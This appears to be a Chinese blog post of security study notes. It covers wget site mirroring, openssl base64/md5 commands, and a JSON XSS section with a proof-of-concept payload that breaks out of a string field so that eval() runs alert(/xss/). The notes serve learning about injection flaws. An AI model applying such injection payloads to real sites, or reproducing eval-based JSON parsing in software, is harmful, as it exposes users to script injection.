文章目录
  1. 1. wget 作镜像
  2. 2. openSSL 的base64
    1. 2.1. openssl_md5
    2. 2.2. 小游戏
  3. 3. JSON attack xss
    1. 3.1. JSON解析原理:
    2. 3.2. example:
    3. 3.3. POC:
    4. 3.4. 解析之后
  4. 4. Pending

wget 作镜像

1
2
wget http://a.com -r -R '*.gif,*.jpg,*.png,*.css,*.js'
wget http://b.com -r -A '*.html,*.htm,*.php,*.asp,*.aspx,*.jsp,*do'

-r 递归扫描 –depth 1 只扫到一级目录
-A accept 接受的文件类型
-R reject 拒绝的文件类型
–http-user –http-password 身份认证
–save-cookies –load-cookies 存储/加载cookies
–log 存储日志

openSSL 的base64

1
2
3
4
5
6
7
#decode
echo 'b3BlbnNzbA==' | openssl base64 -d #-d decode
#encode
echo -n 'openssl' | openssl base64 -e #-e encode
#注意 -n必需 -n就表示不输入回车符
#code with file
openssl base64 -e/-d -in input.txt -out output.txt

cookie 一般使用base64编码

openssl还支持rsa md2 md5 sha sha1 sha224 sha256 sha384 sha512 des3编码,棒!

openssl_md5

a.

1
2
3
4
5
6
7
#a
1. openssl
2. 输入md5后回车
3. 接着输入123456,不要输入回车.然后按3次ctrl+d.
4. 输出密文
#b
echo -n 123456 | openssl md5

其他同理~

小游戏

Binary Tree
手画画了好久..

JSON attack xss

应该算是个存储型吧
AJAX组件通过JavaScript对象符号JSON来接受输入,即JSON内的数据接受javascript的解析

JSON解析原理:

1
2
3
4
5
6
7
JSON.parse()
//解析JSON字符串, 可以选择改变前面解析后的值及其属性,然后返回解析的值.
JSON.stringify()
//返回指定值的 JSON 字符串,可以自定义只包含某些特定的属性或替换属性值.
var code = '"nihao"';
JSON.parse(code);
eval(code);

example:

1
2
3
4
5
6
7
8
9
10
11
{
"menu":
{
"address":
{
"line1":"User Inputs",
"line2":"Beijing",
"line3":"Shanghai"
}
}
}

POC:

1
2
3
4
<!-- User Inputs: -->
", //闭合
xxx1:alert(/xss/), //xxx1,xxx2则为语法需要,任意即可
xxx2:" //闭合

解析之后

1
2
3
4
5
6
7
8
9
10
11
eval({
"menu":
{
"address":
{
"line1":"",xxx1:alert(/xss/),xxx2:" ",
"line2":"Beijing",
"line3":"Shanghai"
}
}
})

Other :
查找网站平台/框架
注释 页头信息(header)

Pending

  1. curl 自动化xss检测 && 目录遍历 P137 单独blog
  2. Command Injection
  3. Xpath Injection
文章目录
  1. 1. wget 作镜像
  2. 2. openSSL 的base64
    1. 2.1. openssl_md5
    2. 2.2. 小游戏
  3. 3. JSON attack xss
    1. 3.1. JSON解析原理:
    2. 3.2. example:
    3. 3.3. POC:
    4. 3.4. 解析之后
  4. 4. Pending